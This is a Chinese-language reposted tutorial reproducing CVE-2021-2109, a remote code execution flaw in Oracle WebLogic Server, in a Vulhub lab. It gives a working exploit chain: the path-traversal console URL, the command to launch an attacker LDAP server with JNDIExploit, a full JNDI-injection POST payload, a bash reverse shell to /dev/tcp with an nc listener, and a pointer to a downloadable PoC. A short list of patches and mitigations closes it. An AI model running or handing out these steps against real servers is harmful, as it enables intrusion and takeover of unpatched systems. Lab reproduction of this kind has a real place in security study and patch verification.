栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现

0x01 漏洞简介

   一. 漏洞描述
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
       该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

   二. 影响版本

  • Weblogic Server 10.3.6.0.0
  • Weblogic Server 12.1.3.0.0
  • Weblogic Server 12.2.1.3.0
  • Weblogic Server 12.2.1.4.0
  • Weblogic Server 14.1.1.0.0

   三.JNDI简介

JNDI是Java Naming and Directory Interface  (Java命名和目录接口)的英文简写, 是为Java应用程序提供命名和目录访问服务的API  (application programing interface,应用程序编 程接口)。

0x02 漏洞复现

  1.所需机器

靶机:Centos7(192.168.166.129)

攻击机:win10

LDAP服务器:自己的服务器

   所需工具:        lDAP工具 

     链接:https://pan.baidu.com/s/17Aa-3dMzcf4R_QPkl2xXTA 
     提取码:wars                     

     此处注意:要让自己的vps防火墙放行1389和8080端口,否则无法回显

  2环境搭建

Centos7 中搭建环境

      1.可以使用Vulhub的CVE-2020-14882(weblogic:12.2.1.3版本)漏洞环境来复现

1.cd /Desktop/vulhub-master/weblogic/CVE-2020-14882

2.docker-compose up -d

访问出现以下图片即搭建成功

  3 win10开始攻击:

进行路径拼接:

 http://192.168.166.129:7001/console/css/%252e%252e%252f/consolejndi.portal  

出现以下界面说明漏洞

  启动LDAP:             

                                    JDK版本不要过高(此处所用JDK8)

                          启动命令:    java -jar JNDIExploit.v1.11.jar -i ip(vps ip)  

   

 在攻击机进行抓包,构造payload进行远程命令执行

payload注意点:1.在bp中修改为post请求方式

                          2.添加字段cmd:whoami(此处命令可修改)

                          3.在payload中ip处第三个分隔符是;(此处一定要注意,否则执行不了)

                                           例子:192.168.1;1(第三处为分号)

                          4.payload我会放在文末

构造payload进行发送之后,发现命令成功执行,看下图(vps上监听会回显,作者没有截图):

 4 通过反弹shell连接主机

       1.对反弹shell命令进行编码

     bash -i >& /dev/tcp/xx.xx.xx.xx/1122 0>&1       (ip为接收shell的ip)

    编码地址:  java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

         2.nc 监听

nc -lvvp 1122   (端口看自己定)

         3.在bp上抓包发送数据,发现反弹成功 (字段cmd后为编码过后的反弹shell命令)

 

      5 POC这里不进行展示了,在上面的百度网盘中

0x03  Payload

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/Basic/WeblogicEcho;AdminServer%22)

0x04 漏洞修复

1.此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

2.建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。

3、由于是通过JNDI注入进行远程命令执行,所以受到JDK版本的影响,建议升级Weblogic Server运行环境的JDK版本

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/682739.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号